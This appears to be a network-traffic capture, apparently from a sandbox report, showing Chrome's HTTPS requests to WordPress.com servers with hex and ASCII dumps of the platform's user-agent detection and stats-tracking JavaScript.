                                                                                                                                                                                                                                                                  Data Ascii: fRQ\'e/NlY^^v*>o&bfNWoO!&Ksviuqo?/qUy7F>!w)!W5-,/}!Dcr/K!/;Z!u}5L!o'1udTHrs?tF%FL1e9::W,dA!B]x^$


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  11192.168.2.1649717192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC608OUTGET /wp-content/js/mobile-useragent-info.js?m=1609849039i HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s1.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 6113
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/11978-1684465249013.7231
                                                                                                                                                                                                                                                                  Expires: Fri, 30 May 2025 21:09:59 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC888INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 7b 50 4c 41 54 46 4f 52 4d 5f 57 49 4e 44 4f 57 53 3a 22 77 69 6e 64 6f 77 73 22 2c 50 4c 41 54 46 4f 52 4d 5f 49 50 48 4f 4e 45 3a 22 69 70 68 6f 6e 65 22 2c 50 4c 41 54 46 4f 52 4d 5f 49 50 4f 44 3a 22 69 70 6f 64 22 2c 50 4c 41 54 46 4f 52 4d 5f 49 50 41 44 3a 22 69 70 61 64 22 2c 50 4c 41 54 46 4f 52 4d 5f 42 4c 41 43 4b 42 45 52 52 59 3a 22 62 6c 61 63 6b 62 65 72 72 79 22 2c 50 4c 41 54 46 4f 52 4d 5f 42 4c 41 43 4b 42 45 52 52 59 5f 31 30 3a 22 62 6c 61 63 6b 62 65 72 72 79 5f 31 30 22 2c 50 4c 41 54 46 4f 52 4d 5f 53 59 4d 42 49 41 4e 3a 22 73 79 6d 62 69 61 6e 5f 73 65 72 69 65 73 36 30 22 2c 50 4c 41 54 46 4f 52 4d 5f 53 59 4d 42 49 41 4e 5f 53 34 30 3a 22 73 79 6d 62 69 61 6e 5f 73 65 72
                                                                                                                                                                                                                                                                  Data Ascii: (function(e){var i={PLATFORM_WINDOWS:"windows",PLATFORM_IPHONE:"iphone",PLATFORM_IPOD:"ipod",PLATFORM_IPAD:"ipad",PLATFORM_BLACKBERRY:"blackberry",PLATFORM_BLACKBERRY_10:"blackberry_10",PLATFORM_SYMBIAN:"symbian_series60",PLATFORM_SYMBIAN_S40:"symbian_ser
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 74 4e 61 6d 65 21 3d 3d 66 61 6c 73 65 29 72 65 74 75 72 6e 20 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3b 69 66 28 69 2e 75 73 65 72 41 67 65 6e 74 3d 3d 3d 66 61 6c 73 65 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 69 66 28 69 2e 69 73 43 68 72 6f 6d 65 46 6f 72 49 4f 53 28 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 63 68 72 6f 6d 65 2d 66 6f 72 2d 69 6f 73 22 3b 65 6c 73 65 20 69 66 28 69 2e 69 73 54 77 69 74 74 65 72 46 6f 72 49 70 61 64 28 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 74 77 69 74 74 65 72 2d 66 6f 72 2d 69 70 61 64 22 3b 65 6c 73 65 20 69 66 28 69 2e 69 73 54 77 69 74 74 65 72 46 6f 72 49 70 68 6f 6e 65 28 29 29 69 2e 6d 61 74 63 68 65 64 55 73
                                                                                                                                                                                                                                                                  Data Ascii: tName!==false)return i.matchedUserAgentName;if(i.userAgent===false)return false;if(i.isChromeForIOS())i.matchedUserAgentName="chrome-for-ios";else if(i.isTwitterForIpad())i.matchedUserAgentName="twitter-for-ipad";else if(i.isTwitterForIphone())i.matchedUs
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 20 69 66 28 69 2e 69 73 57 6f 72 64 50 72 65 73 73 46 6f 72 49 6f 73 28 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 69 6f 73 2d 61 70 70 22 3b 65 6c 73 65 20 69 66 28 72 28 22 69 70 68 6f 6e 65 22 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 69 70 68 6f 6e 65 2d 75 6e 6b 6e 6f 77 6e 22 3b 65 6c 73 65 20 69 66 28 72 28 22 69 70 61 64 22 29 29 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 3d 22 69 70 61 64 2d 75 6e 6b 6e 6f 77 6e 22 3b 72 65 74 75 72 6e 20 69 2e 6d 61 74 63 68 65 64 55 73 65 72 41 67 65 6e 74 4e 61 6d 65 7d 2c 67 65 74 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61
                                                                                                                                                                                                                                                                  Data Ascii: if(i.isWordPressForIos())i.matchedUserAgentName="ios-app";else if(r("iphone"))i.matchedUserAgentName="iphone-unknown";else if(r("ipad"))i.matchedUserAgentName="ipad-unknown";return i.matchedUserAgentName},getPlatformName:function(){if(i.matchedPlatformNa
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 4f 52 4d 5f 4d 4f 42 49 4c 45 5f 47 45 4e 45 52 49 43 7d 72 65 74 75 72 6e 20 69 2e 6d 61 74 63 68 65 64 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 7d 2c 67 65 74 42 6c 61 63 6b 42 65 72 72 79 4f 53 56 65 72 73 69 6f 6e 3a 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 2e 69 73 42 6c 61 63 6b 62 65 72 72 79 31 30 28 29 29 72 65 74 75 72 6e 22 31 30 22 3b 69 66 28 21 72 28 22 62 6c 61 63 6b 62 65 72 72 79 22 29 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 76 61 72 20 65 3d 2d 31 3b 76 61 72 20 61 3b 69 66 28 72 28 22 77 65 62 6b 69 74 22 29 29 7b 61 3d 2f 56 65 72 73 69 6f 6e 5c 2f 28 5b 5c 64 5c 2e 5d 2b 29 2f 69 7d 65 6c 73 65 7b 61 3d 2f 42 6c 61 63 6b 42 65 72 72 79 5c 77 2b 5c 2f 28 5b 5c 64 5c 2e 5d 2b 29 2f 69 7d 69 66 28 61 2e 65 78 65 63 28 69 2e 75 73
                                                                                                                                                                                                                                                                  Data Ascii: ORM_MOBILE_GENERIC}return i.matchedPlatformName},getBlackBerryOSVersion:a(function(){if(i.isBlackberry10())return"10";if(!r("blackberry"))return false;var e=-1;var a;if(r("webkit")){a=/Version\/([\d\.]+)/i}else{a=/BlackBerry\w+\/([\d\.]+)/i}if(a.exec(i.us
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1118INData Raw: 22 73 65 72 69 65 73 36 30 22 29 7d 65 6c 73 65 20 69 66 28 72 28 22 73 79 6d 62 69 61 6e 6f 73 22 29 26 26 72 28 22 73 65 72 69 65 73 36 30 22 29 29 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 65 6c 73 65 20 69 66 28 72 28 22 6e 6f 6b 69 61 22 29 26 26 72 28 22 73 65 72 69 65 73 36 30 22 29 29 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 65 6c 73 65 20 69 66 28 72 28 22 6f 70 65 72 61 20 6d 69 6e 69 22 29 29 7b 72 65 74 75 72 6e 20 72 28 22 73 79 6d 62 69 61 6e 6f 73 22 29 7c 7c 72 28 22 73 79 6d 62 6f 73 22 29 7c 7c 72 28 22 73 65 72 69 65 73 20 36 30 22 29 7d 7d 29 2c 69 73 4b 69 6e 64 6c 65 46 69 72 65 3a 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 73 69 6c 6b 2f 22 29 26 26 72 28 22 73 69 6c 6b 2d 61 63 63 65 6c 65 72 61 74 65 64 3d 22
                                                                                                                                                                                                                                                                  Data Ascii: "series60")}else if(r("symbianos")&&r("series60")){return true}else if(r("nokia")&&r("series60")){return true}else if(r("opera mini")){return r("symbianos")||r("symbos")||r("series 60")}}),isKindleFire:a(function(){return r("silk/")&&r("silk-accelerated="


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  12192.168.2.1649720192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC527OUTGET /w.js?67 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: stats.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC432INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 12788
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/12827-1705538370109.567
                                                                                                                                                                                                                                                                  Expires: Fri, 17 Jan 2025 00:39:38 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  X-nc: HIT dfw
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC937INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 6f 29 7b 69 66 28 65 5b 6f 5d 29 72 65 74 75 72 6e 20 65 5b 6f 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 65 5b 6f 5d 3d 7b 69 3a 6f 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6f 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6f 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6f 7d 29 7d 2c 6e 2e 72 3d 66 75 6e
                                                                                                                                                                                                                                                                  Data Ascii: !function(t){var e={};function n(o){if(e[o])return e[o].exports;var r=e[o]={i:o,l:!1,exports:{}};return t[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=t,n.c=e,n.d=function(t,e,o){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:o})},n.r=fun
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 74 2e 65 78 70 6f 72 74 73 3d 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 74 2e 65 78 70 6f 72 74 73 3d 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 74 7d 2c 6e 28 65 29 7d 74 2e 65 78 70 6f 72 74 73 3d 6e 7d 2c
                                                                                                                                                                                                                                                                  Data Ascii: n(e){return"function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?t.exports=n=function(t){return typeof t}:t.exports=n=function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},n(e)}t.exports=n},
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 5b 72 5d 2e 73 75 62 73 74 72 69 6e 67 28 6e 29 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 29 3b 76 61 72 20 6f 3d 6e 28 30 29 2c 72 3d 6e 2e 6e 28 6f 29 2c 69 3d 6e 28 31 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 76 61 72 20 65 3d 5b 5d 3b 69 66 28 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 65 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 74 29 2c 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 2e 67 65 74 52 61 6e 64
                                                                                                                                                                                                                                                                  Data Ascii: rn decodeURIComponent(o[r].substring(n));return null}},function(t,e,n){"use strict";n.d(e,"a",function(){return T});var o=n(0),r=n.n(o),i=n(1);function a(t){var e=[];if(window.crypto&&window.crypto.getRandomValues)e=new Uint8Array(t),window.crypto.getRand
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 6e 20 74 28 65 2c 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 3d 72 28 29 28 65 29 29 72 65 74 75 72 6e 20 65 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 75 6c 6c 21 3d 6e 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 72 28 29 28 6e 29 7c 7c 28 6e 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 29 2c 65 29 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 26 26 28 6e 5b 6f 5d 3d 74 28 65 5b 6f 5d 29 29 3b 72 65 74 75 72 6e 20 6e 7d 28 6c 2c 74 29 2c 79 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 65 2e 70 75 73 68 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 2b 22 3d 22 2b 65
                                                                                                                                                                                                                                                                  Data Ascii: n t(e,n){if(null==e||"object"!==r()(e))return e;for(var o in null!=n&&"object"===r()(n)||(n=e.constructor()),e)e.hasOwnProperty(o)&&(n[o]=t(e[o]));return n}(l,t),y(function(t){var e=[];for(var n in t)t.hasOwnProperty(n)&&e.push(encodeURIComponent(n)+"="+e
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 22 2b 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2b 22 26 5f 3d 5f 22 2c 6e 2e 61 6c 74 3d 22 22 7d 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 53 28 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 65 29 69 66 28 74 3d 3d 6e 5b 65 5d 29 72 65 74 75 72 6e 3b 6e 2e 70 75 73 68 28 74 29 2c 62 28 6e 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 2e 6a 6f 69 6e 28 22 20 22 29 2e 6c 65 6e 67 74 68 3e 32 30 34 38 3b 29 74 3d 74 2e 73 6c 69 63 65 28 31 29 3b 6b 28 22 71 73 22 2c 74 2e 6a 6f 69 6e 28 22 20 22 29 2c 31 38 30 30 29 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 5b 5d 2c 6f 3d 53 28 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6f 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                  Data Ascii: "+(new Date).getTime()+"&_=_",n.alt=""}},g=function(t){var e,n=S();for(e=0;e<n.length;++e)if(t==n[e])return;n.push(t),b(n)},b=function(t){for(;t.join(" ").length>2048;)t=t.slice(1);k("qs",t.join(" "),1800)},_=function(t){var e,n=[],o=S();for(e=0;e<o.lengt
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 22 2c 65 2e 6a 6f 69 6e 28 22 2c 22 29 29 2c 68 28 7b 5f 65 6e 3a 22 5f 61 6c 69 61 73 55 73 65 72 47 65 6e 65 72 61 6c 22 2c 6e 65 78 74 75 73 65 72 69 64 3a 74 2c 6e 65 78 74 75 73 65 72 69 64 74 79 70 65 3a 22 61 6e 6f 6e 22 2c 70 72 65 76 75 73 65 72 69 64 3a 63 2c 70 72 65 76 75 73 65 72 69 64 74 79 70 65 3a 22 61 6e 6f 6e 22 7d 29 29 7d 6b 28 22 61 69 22 2c 74 29 2c 63 3d 74 2c 75 3d 22 61 6e 6f 6e 22 7d 65 6c 73 65 20 68 28 7b 5f 65 6e 3a 22 5f 61 6c 69 61 73 55 73 65 72 22 2c 61 6e 6f 6e 49 64 3a 74 7d 29 7d 2c 72 65 63 6f 72 64 45 76 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 5f 73 65 74 50 72 6f 70 65 72 74 69 65 73 22 21 3d 3d 74 26 26 28 28 65 3d 65 7c 7c 7b 7d 29 2e 5f 65 6e 3d 74 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70
                                                                                                                                                                                                                                                                  Data Ascii: ",e.join(",")),h({_en:"_aliasUserGeneral",nextuserid:t,nextuseridtype:"anon",prevuserid:c,prevuseridtype:"anon"}))}k("ai",t),c=t,u="anon"}else h({_en:"_aliasUser",anonId:t})},recordEvent:function(t,e,n){"_setProperties"!==t&&((e=e||{})._en=t,"string"==typ
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 72 69 6e 67 2e 63 61 6c 6c 28 74 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 72 65 74 75 72 6e 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 2c 22 4d 61 70 22 3d 3d 3d 6e 7c 7c 22 53 65 74 22 3d 3d 3d 6e 3f 41 72 72 61 79 2e 66 72 6f 6d 28 6e 29 3a 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 6e 7c 7c 2f 5e 28 3f 3a 55 69 7c 49 29 6e 74 28 3f 3a 38 7c 31 36 7c 33 32 29 28 3f 3a 43 6c 61 6d 70 65 64 29 3f 41 72 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 3f 6f 28 74 2c 65 29 3a 76 6f 69 64 20 30 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 28 6e 75 6c 6c 3d 3d 65 7c 7c 65 3e 74 2e
                                                                                                                                                                                                                                                                  Data Ascii: ring.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(n):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?o(t,e):void 0}}},function(t,e){t.exports=function(t,e){(null==e||e>t.
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 28 22 6f 62 6a 65 63 74 22 21 3d 3d 61 28 29 28 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 72 65 74 75 72 6e 3b 6e 3d 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 65 2e 68 6f 73 74 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 22 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 65 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 74 2e 70 72 6f 74 6f 63 6f 6c 26 26 65 2e 68 6f 73 74 3d 3d 3d 74 2e 68 6f 73 74 6e 61 6d 65 29 7b 69 66 28 22 68 74 74 70 3a 22 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 65 2e 68 6f 73 74 2b 22 3a 38 30 22 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 68 74 74
                                                                                                                                                                                                                                                                  Data Ascii: ("object"!==a()(n.parentNode))return;n=n.parentNode}if(function(t){var e=document.location;if(e.host===t.host)return!0;if(""===t.host)return!0;if(e.protocol===t.protocol&&e.host===t.hostname){if("http:"===e.protocol&&e.host+":80"===t.host)return!0;if("htt
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 65 5d 29 29 3b 72 65 74 75 72 6e 20 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6f 3d 6e 65 77 20 49 6d 61 67 65 3b 6f 2e 73 72 63 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 70 69 78 65 6c 2e 77 70 2e 63 6f 6d 2f 22 2b 74 2b 22 3f 22 2b 65 2b 22 26 72 61 6e 64 3d 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2c 6f 2e 61 6c 74 3d 22 22 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 28 6f 2e 69 64 3d 6e 2c 70 28 6e 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 29 7d 2c 70 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                  Data Ascii: odeURIComponent(t[e]));return n.join("&")},l=function(t,e,n){var o=new Image;o.src=document.location.protocol+"//pixel.wp.com/"+t+"?"+e+"&rand="+Math.random(),o.alt="","string"==typeof n&&document.body&&(o.id=n,p(n),document.body.appendChild(o))},p=functi
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC899INData Raw: 67 69 66 22 2c 66 28 74 29 2c 22 77 70 73 74 61 74 73 22 29 7d 2c 65 78 74 72 61 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 76 3d 22 77 70 63 6f 6d 2d 6e 6f 2d 70 76 22 2c 6c 28 22 67 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 72 61 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 28 22 67 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 63 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 28 22 63 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 63 6c 69 63 6b 54 72 61 63 6b 65 72 49 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 64 2e 69 6e 69 74 28 74 2c 65 29 7d 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 7c 7c 28 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65
                                                                                                                                                                                                                                                                  Data Ascii: gif",f(t),"wpstats")},extra:function(t){t.v="wpcom-no-pv",l("g.gif",f(t),!1)},raw:function(t){l("g.gif",f(t),!1)},click:function(t){l("c.gif",f(t),!1)},clickTrackerInit:function(t,e){d.init(t,e)}},y=function t(){document.hidden||(document.removeEventListe


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  13192.168.2.1649719192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
